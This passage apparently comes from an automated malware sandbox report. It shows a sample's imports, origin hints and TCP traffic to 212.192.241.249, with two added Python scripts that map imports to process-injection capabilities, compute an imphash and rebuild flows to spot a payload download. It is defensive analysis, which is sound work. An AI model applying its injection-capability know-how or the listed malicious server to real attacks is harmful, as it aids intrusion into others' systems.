            ADVAPI32.dll | GetFileSecurityW
            MSIMG32.dll | AlphaBlend
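
The KERNEL32 import list above is long, and most of it (EnumCalendarInfoA, GetTapeParameters, SetFirmwareEnvironmentVariableA and the like) is of no use to a loader, so the few entries that matter are easy to miss. As an added example that is not part of the report, the Python below maps a subset of the listed imports (transcribed in page order) onto capability sets and reports which APIs of each set are present and which are missing: OpenProcess, CreateRemoteThread and GetThreadContext are imported, WriteProcessMemory, VirtualAllocEx and SetThreadContext are not, but LoadLibrary*/GetProcAddress are, so the gaps can be filled at runtime, which is consistent with the report's "Contains functionality to dynamically determine API calls" and with the observed thread injection. It also implements pefile's imphash normalisation so the Import Hash field above is reproducible; because it runs over a subset, its digest is not expected to equal the reported ee6524c22cc0cf74d4c47508c44cd3e2, which covers the full ordered table. The capability sets are the example's own assumptions.

```python
import hashlib

# Subset of the report's import table, in the order the names appear on the page.
REPORT_IMPORTS = {
    "KERNEL32.dll": [
        "EnumCalendarInfoA", "CommConfigDialogA", "LoadLibraryExW",
        "SetFirmwareEnvironmentVariableA", "GetModuleHandleW", "CreateRemoteThread",
        "OpenProcess", "TerminateProcess", "GetProcAddress", "LoadLibraryA",
        "Process32FirstW", "GetTapeParameters", "IsDebuggerPresent", "VirtualProtect",
        "OutputDebugStringA", "DuplicateHandle", "CreateFileW", "GetThreadContext",
        "ExitProcess", "WriteFile", "LoadLibraryW",
    ],
    "USER32.dll": ["GetMessageTime"],
    "GDI32.dll": ["GetBitmapBits"],
    "ADVAPI32.dll": ["GetFileSecurityW"],
    "MSIMG32.dll": ["AlphaBlend"],
}

# Win32 API sets that together implement one capability (assumed groupings).
CAPABILITIES = {
    "remote thread injection": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "thread context hijacking": {"OpenProcess", "GetThreadContext", "SetThreadContext", "ResumeThread"},
    "process enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "dynamic API resolution": {"LoadLibraryA", "GetProcAddress"},
    "anti-debugging": {"IsDebuggerPresent"},
}

def all_imports(imports):
    return {name for funcs in imports.values() for name in funcs}

def assess_capabilities(imports):
    """For each capability, which of its APIs the static table imports and which it lacks."""
    present = all_imports(imports)
    return {cap: {"present": sorted(needed & present), "missing": sorted(needed - present)}
            for cap, needed in CAPABILITIES.items()}

def resolves_apis_at_runtime(imports):
    """GetProcAddress plus any LoadLibrary* variant makes the static table a lower
    bound: missing APIs can be looked up by name or hash at runtime."""
    names = all_imports(imports)
    return "GetProcAddress" in names and any(n.startswith("LoadLibrary") for n in names)

def imphash_input(imports):
    """pefile's imphash normalisation: 'dll.func' lower-cased, the .dll/.ocx/.sys
    extension stripped, joined with commas in import-table order. (Imports by
    ordinal, which this table has none of, would appear as 'ordN'.)"""
    parts = []
    for dll, funcs in imports.items():
        lib = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[:-len(ext)]
                break
        parts.extend("%s.%s" % (lib, f.lower()) for f in funcs)
    return ",".join(parts)

def imphash(imports):
    return hashlib.md5(imphash_input(imports).encode("ascii")).hexdigest()

if __name__ == "__main__":
    for cap, r in assess_capabilities(REPORT_IMPORTS).items():
        state = "complete" if not r["missing"] else "partial, missing " + ", ".join(r["missing"])
        print("%-26s %s" % (cap, state))
    print("runtime API resolution available:", resolves_apis_at_runtime(REPORT_IMPORTS))
    print("imphash over this subset:", imphash(REPORT_IMPORTS))
```

The practical reading: when a capability set is only partially imported but dynamic resolution is present, treat the static import list as incomplete and rely on the dynamic signatures (thread injection, code-integrity checks) rather than on the table.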

            Version Infos

            Description | Data
            Translations | 0x0022 0x023c

            Possible Origin

            Language of compilation system | Country where language is spoken
            Divehi; Dhivehi; Maldivian | Maldives
            Spanish | Panama

            Network Behavior

            Network Port Distribution
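
The TCP Packets table below records one segment per row, which hides the shape of the traffic; the first step is to fold rows into flows. As an added example that is not taken from the report, the Python below parses rows transcribed from that table (the two short connections from source ports 49714 and 49715 in full, plus the first ten segments of the third, 49716), keys them on the client/server 4-tuple, counts segments per direction, measures each flow's duration in integer nanoseconds so the sub-microsecond stamps are not rounded away, and flags the flow where the server sends markedly more segments than the client, which is the shape of an HTTP response carrying a payload (cf. "Downloads executable code via HTTP" in the signature list). Taking the higher port as the client side and the 1.25 ratio are the example's assumptions.

```python
from datetime import datetime, timezone

# Rows transcribed from the report's TCP Packets table.
# Columns: timestamp | source port | dest port | source IP | dest IP
PACKETS = """
Nov 25, 2021 18:24:50.037879944 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.065604925 CET | 80 | 49714 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.065758944 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.066019058 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.066059113 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.093697071 CET | 80 | 49714 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.207442999 CET | 80 | 49714 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.207555056 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.208436966 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.235953093 CET | 80 | 49714 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.260036945 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.287899017 CET | 80 | 49715 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.288031101 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.288214922 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.288240910 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.428165913 CET | 80 | 49715 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.428299904 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.428689957 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.456434965 CET | 80 | 49715 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.767328024 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.795320988 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.799561977 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.799880028 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
Nov 25, 2021 18:24:50.870975971 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.919018984 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.919063091 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.919090033 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.919117928 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
Nov 25, 2021 18:24:50.919147968 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
"""

def parse_timestamp_ns(text):
    """'Nov 25, 2021 18:24:50.037879944 CET' -> integer nanoseconds since the epoch.
    Kept as int: a float near 1.6e9 s cannot hold the nanosecond digits. The zone
    label is assumed constant across the capture and treated as UTC."""
    stamp, rest = text.split(".", 1)
    base = datetime.strptime(stamp, "%b %d, %Y %H:%M:%S").replace(tzinfo=timezone.utc)
    return int(base.timestamp()) * 10**9 + int(rest.split()[0].ljust(9, "0"))

def parse_packets(table):
    rows = []
    for line in table.strip().splitlines():
        ts, sport, dport, sip, dip = [c.strip() for c in line.split("|")]
        rows.append((parse_timestamp_ns(ts), int(sport), int(dport), sip, dip))
    return rows

def reconstruct_flows(rows):
    """Group segments into flows keyed (client_ip, client_port, server_ip, server_port);
    the side with the higher port is taken as the client (ephemeral vs. service port)."""
    flows = {}
    for ts, sport, dport, sip, dip in rows:
        if sport > dport:
            key, direction = (sip, sport, dip, dport), "to_server"
        else:
            key, direction = (dip, dport, sip, sport), "to_client"
        f = flows.setdefault(key, {"first_ns": ts, "last_ns": ts, "to_server": 0, "to_client": 0})
        f["first_ns"], f["last_ns"] = min(f["first_ns"], ts), max(f["last_ns"], ts)
        f[direction] += 1
    return flows

def flow_duration_ns(flow):
    return flow["last_ns"] - flow["first_ns"]

def port_distribution(flows):
    """Flows per (server IP, server port): what a port-distribution chart summarises."""
    dist = {}
    for (_, _, sip, sport) in flows:
        dist[(sip, sport)] = dist.get((sip, sport), 0) + 1
    return dist

def download_like(flows, min_ratio=1.25):
    """Flows where the server sent at least min_ratio times as many segments as the
    client: a response carrying a body rather than a short beacon exchange."""
    return sorted(k for k, f in flows.items() if f["to_client"] >= min_ratio * f["to_server"])

if __name__ == "__main__":
    flows = reconstruct_flows(parse_packets(PACKETS))
    for key, f in sorted(flows.items()):
        print("%s:%d -> %s:%d  to_server=%d to_client=%d  %.3f ms"
              % (key + (f["to_server"], f["to_client"], flow_duration_ns(f) / 1e6)))
    print("port distribution:", port_distribution(flows))
    print("download-like flows:", download_like(flows))
```

On the transcribed rows the first two connections are short, client-dominated exchanges (6 segments out, 4 and 3 back), while the third is server-dominated from its first ten segments on; all three go to 212.192.241.249:80, so the port distribution is a single entry.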

            TCP Packets

            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Nov 25, 2021 18:24:50.037879944 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.065604925 CET | 80 | 49714 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.065758944 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.066019058 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.066059113 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.093697071 CET | 80 | 49714 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.207442999 CET | 80 | 49714 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.207555056 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.208436966 CET | 49714 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.235953093 CET | 80 | 49714 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.260036945 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.287899017 CET | 80 | 49715 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.288031101 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.288214922 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.288240910 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.428165913 CET | 80 | 49715 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.428299904 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.428689957 CET | 49715 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.456434965 CET | 80 | 49715 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.767328024 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.795320988 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.799561977 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.799880028 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.870975971 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919018984 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919063091 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919090033 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919117928 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919147968 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919151068 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.919182062 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919210911 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919230938 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.919248104 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919251919 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.919274092 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919300079 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.919302940 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.919450045 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.947226048 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.961850882 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.961916924 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.961945057 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.961956978 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.961996078 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.962018967 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.962035894 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.962049007 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.962078094 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.962095022 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.962119102 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.962127924 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.962208033 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.989969015 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.990011930 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.990041018 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.990052938 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:50.990087032 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:50.990113020 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.017946959 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.018009901 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.018052101 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.018093109 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.018120050 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.018157959 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.018162966 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.018167973 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.045954943 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.046006918 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.046047926 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.046087027 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.046101093 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.046125889 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.046128035 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.046200991 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.074820042 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.074863911 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.074948072 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.074954033 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.074997902 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.075036049 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.075062037 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.075074911 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.075099945 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.075136900 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.075145006 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.103456020 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.103501081 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.103538990 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.103579044 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.103598118 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.103679895 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.131496906 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.131546021 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.131656885 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.159498930 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.159579039 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.159650087 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.159760952 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.187458038 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.187613010 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.187735081 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.189636946 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.217515945 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.217581034 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.217709064 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.221803904 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.245457888 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.249753952 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.249970913 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.277760029 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.277798891 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.278006077 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.379056931 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.381699085 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.409660101 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.409914017 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.437843084 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.437869072 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.438057899 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.465949059 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.466016054 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.466161966 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.494040966 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.494179964 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.521953106 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.522013903 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.522066116 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.522092104 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.549841881 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.549889088 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.549902916 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.599461079 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.599549055 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.599615097 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.627549887 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.627604961 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.627692938 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.655698061 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.655757904 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.655848980 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.683588028 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.683639050 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.683680058 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.711529970 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.711560011 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.711618900 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.739902973 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.739976883 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.740025043 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.740072966 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.740106106 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.740150928 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.740155935 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.768027067 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.768143892 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.768209934 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.768259048 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.768304110 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.796014071 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.796041012 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.796175957 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.823955059 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.823983908 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.824002028 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.824032068 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.824124098 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.824156046 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.851840973 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.851875067 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.851887941 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.851903915 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.851984024 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.852013111 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.880937099 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.880970001 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.880990982 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.881011963 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.881031990 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.881067038 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.908752918 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.908798933 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.908839941 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.908898115 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:51.908984900 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.909017086 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:51.983108044 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.038594961 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:52.066570044 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.066613913 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.066653013 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.066692114 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.066732883 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.066756964 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
